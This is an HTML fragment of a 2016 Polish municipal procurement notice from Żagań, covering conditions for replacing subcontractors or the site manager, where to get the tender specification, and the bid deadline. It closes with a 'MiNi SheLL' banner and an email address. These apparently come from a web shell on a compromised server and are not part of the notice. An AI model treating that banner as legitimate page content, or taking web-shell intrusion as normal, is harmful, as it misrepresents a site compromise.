   a)  na którego zasoby Wykonawca  powoływał się w celu wykazania spełnienia warunków 
        udziału w postepowaniu, lub 
   b)  z którym zawarto umowę o podwykonawstwo w trakcie realizacji zamówienia   
        publicznego,   pod warunkiem, że : 
        - Wykonawca  wykaże, iż proponowany inny podwykonawca spełni warunki udziału w 
          postepowaniu w stopniu nie mniejszym niż wymagany w trakcie postepowania o 
          udzielenie zamówienia; lub 
       -  Wykonawca  wykaże,  iż samodzielnie spełni warunki udziału w postępowaniu w 
          stopniu nie mniejszym niż wymagany w trakcie postpowania o udzielenie zamówienia; 
3) w zakresie zmiany kierownika budowy, za uprzednią pisemną zgodą Zamawiającego, 
     w przypadku, gdy : 
     a) Wykonawca z własnej inicjatywy proponuje zmianę kierownika budowy w  przypadku  
           - choroby lub innych zdarzeń losowych dotyczących kierownika, 
           - nie wywiązywania się kierownika budowy z obowiązków wynikających z Umowy 
              zawartej w ramach przedmiotowego zamówienia, 
           - jeżeli zmiana kierownika budowy stanie się konieczną z jakichkolwiek przyczyn 
             niezależnych od Wykonawcy (np. rezygnacji), 
     b) Zamawiający zażąda  zmiany kierownika budowy gdy  uzna, że nie wykonuje on 
          swoich obowiązków wynikających z Umowy zawartej w ramach przedmiotowego 
          zamówienia bądź unika kontaktu  z inwestorem.. 
     W przypadku zmiany kierownika budowy, nowy kierownik budowy musi spełniać
     wymagania określone w Ogłoszeniu o zamówieniu dla powyższych osób.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.urzadmiasta.zagan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> na pisemny wniosek Wykonawcy. 
Urząd Miasta  68-100 Żagań, ul. Jana Pawła II nr 15 w Wydziale Zamówień Publicznych i Nadzoru Właścicielskiego pok. nr 20, 68-100 Żagań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2016 godzina 11:00, miejsce: Urząd Miasta  68-100 Żagań, ul. Jana Pawła II nr 15  Wydział Zamówień Publicznych i Nadzoru Właścicielskiego pok. nr 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com